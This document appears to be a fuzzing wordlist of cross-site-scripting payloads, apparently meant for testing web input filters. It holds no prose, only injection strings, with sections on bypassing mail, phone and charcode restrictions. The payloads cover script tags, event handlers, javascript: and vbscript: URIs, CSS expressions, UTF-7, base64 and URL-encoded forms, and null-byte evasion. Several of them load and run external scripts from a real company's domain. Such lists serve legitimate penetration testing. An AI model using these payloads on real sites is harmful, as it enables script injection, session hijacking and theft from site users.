-1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE> 
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<BASE HREF="javascript:document.cookie=true;//">
-1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
-1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
-1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
-1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
-1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
-1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
-1<a href="javascript#document.cookie=true;">
-1<div onmouseover="document.cookie=true;">
-1<img src="javascript:document.cookie=true;">
-1<img dynsrc="javascript:document.cookie=true;">
-1<input type="image" dynsrc="javascript:document.cookie=true;">
-1<bgsound src="javascript:document.cookie=true;">
-1&<script>document.cookie=true;</script> 
-1&{document.cookie=true;}; 
-1<img src=&{document.cookie=true;};> 
-1<link rel="stylesheet" href="javascript:document.cookie=true;"> 
-1<img src="mocha:document.cookie=true;"> 
-1<img src="livescript:document.cookie=true;"> 
-1<a href="about:<script>document.cookie=true;</script>"> 
-1<body onload="document.cookie=true;"> 
-1<div style="background-image: url(javascript:document.cookie=true;);"> 
-1<div style="behaviour: url([link to code]);"> 
-1<div style="binding: url([link to code]);"> 
-1<div style="width: expression(document.cookie=true;);">
-1<style type="text/javascript">document.cookie=true;</style>
-1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
-1<style><!--</style><script>document.cookie=true;//--></script>
-1<<script>document.cookie=true;</script>
-1<script>document.cookie=true;//--></script>
-1<!-- -- --><script>document.cookie=true;</script><!-- -- -->
-1<img src="blah"onmouseover="document.cookie=true;">
-1<img src="blah>" onmouseover="document.cookie=true;">
-1<xml src="javascript:document.cookie=true;">
-1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
-1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]>  [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
Cross Site Scripting Strings Restriction Bypass Mail:
>"<iframe src=http://www.deloitte.com/>@gmail.com
>"<script>alert(document.cookie)</script><div style="1@gmail.com
>"<script>alert(document.cookie)</script>@gmail.com
<iframe src=http://www.deloitte.com/>@gmail.com
<script>alert(document.cookie)</script><div style="1@gmail.com
<script>alert(document.cookie)</script>@gmail.com
Cross Site Scripting Strings Restriction Bypass Phone:
+49/>"<iframe src=http://www.deloitte.com>1337
"><iframe src='' onload=alert('mphone')>
<iframe src=http://www.deloitte.com>1337+1
>“<ScriPt>ALeRt(132)</scriPt>
>"<IfRaMe sRc=hTtp://www.deloitte.com></IfRaMe> 
Cross Site Scripting Strings Restriction Bypass String to Charcode
<html><body>
<button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
om.Char.Code</button></body></html>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
'';!--"<CrossSiteScripting>=&{()}
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
%73%63%72%69%70%74%3E
SRC=http://www.deloitte.com/CrossSiteScripting.js></SCRIPT>'"-->
perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out
perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out
<!--[if gte IE 4]>   <SCRIPT>alert('CrossSiteScripting');</SCRIPT>   <![endif]-->
<!--[if gte IE 4]>   <SCRIPT>alert(098);</SCRIPT>   <![endif]-->
<EMBED SRC="http://www.deloitte.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT SRC=http://www.deloitte.com/CrossSiteScripting.js></SCRIPT>
<<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
<SCRIPT SRC=http://www.deloitte.com/CrossSiteScripting.js?<B>
<SCRIPT SRC=//www.deloitte.com/.js>
<SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
<SCRIPT a=">" SRC="http://www.deloitte.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://www.deloitte.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://www.deloitte.com/CrossSiteScripting.js"></SCRIPT>
</TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>
<IMG SRC="javascript:alert('CrossSiteScripting');">
<IMG SRC=javascript:alert('CrossSiteScripting')>
<IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
<IMG SRC=javascript:alert(&quot;CrossSiteScripting&quot;)>
<IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`>
<IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav	ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x09;ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x0A;ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x0D;ascript:alert('CrossSiteScripting');">
<IMG SRC=" &#14;  javascript:alert('CrossSiteScripting');">
<IMG SRC="javascript:alert('CrossSiteScripting')"
<IMG DYNSRC="javascript:alert('CrossSiteScripting')">
<IMG LOWSRC="javascript:alert('CrossSiteScripting')">
<IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
<META HTTP-EQUIV="Link" Content="<http://www.deloitte.com/CrossSiteScripting.css>; REL=stylesheet">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('CrossSiteScripting')&lt;/SCRIPT&gt;">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.deloitte.com/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT>
<STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
<STYLE>@import'http://www.deloitte.com/CrossSiteScripting.css';</STYLE>
<STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
<STYLE>BODY{-moz-binding:url("http://www.deloitte.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>
<DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('CrossSiteScripting'))">
<DIV STYLE="width: expression(alert('CrossSiteScripting'));">
<LAYER SRC="http://www.deloitte.com/script.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
<LINK REL="stylesheet" HREF="http://www.deloitte.com/CrossSiteScripting.css">
<BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
<BODY ONLOAD=alert('CrossSiteScripting')>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")>
<iframe src=http://www.deloitte.com/index.html <
<TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
<TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">
<BGSOUND SRC="javascript:alert('CrossSiteScripting');">
<BR SIZE="&{alert('CrossSiteScripting')}">
<A HREF="http://#/">CrossSiteScripting</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
<A HREF="http://1113982867/">CrossSiteScripting</A>
<A HREF="javascript:document.location='http://www.deloitte.com/'">CrossSiteScripting</A>
<BASE HREF="javascript:alert('CrossSiteScripting');//">
\";alert('CrossSiteScripting');//
<INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');">
<CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);">
¼script¾alert(¢CrossSiteScripting¢)¼/script¾
<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))">  exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");  CrossSiteScripting:&#101;x&#x2F;*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'>
a="get";
b="URL(\"";
c="javascript:";
d="alert('CrossSiteScripting');\")";
eval(v+l+a+b);
<SCRIPT SRC="http://www.deloitte.com/CrossSiteScripting.jpg"></SCRIPT>
<? echo('<SCR)'; echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>
<IMG SRC="http://www.deloitte.com/file.php?variables=malicious">
%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%77%77%2e%64%65%6c%6f%69%74%74%65%2e%63%6f%6d%3e
PGlmcmFtZSBzcmM9aHR0cDovL2RlbG9pdHRlLmNvbT4=
<SCRIPT>alert('Deloitte');</SCRIPT>
<SCRIPT SRC=http://URL></SCRIPT>
<IMG SRC=/ onerror="alert(String.fromCharCode(68,101,108,111,105,116,116,101))">
<img src=x onerror="javascript:window.onerror=alert;throw 'Deloitte'">
<BODY ONLOAD=alert('Deloitte')>
<IFRAME SRC="javascript:alert('Deloitte');"></IFRAME>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiRGVsb2l0dGUiKTs8L3NjcmlwdD4="></object>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIkRlbG9pdHRlIik7PC9zY3JpcHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
%EF%BC%9Cscript%EF%BC%9ealert('xss')%EF%BC%9C/script%EF%BC%9e%9e
<marquee loop=1 width=0 onfinish=alert("Deloitte")>Deloitte</marquee>
</script><script>alert("Deloitte");</script>
<video><source onerror="alert('Deloitte')">
<math href="javascript:alert('Deloitte')">Click</math>
%253Cscript%253Ealert(%2527Deloitte%2527)%253C%252Fscript%253E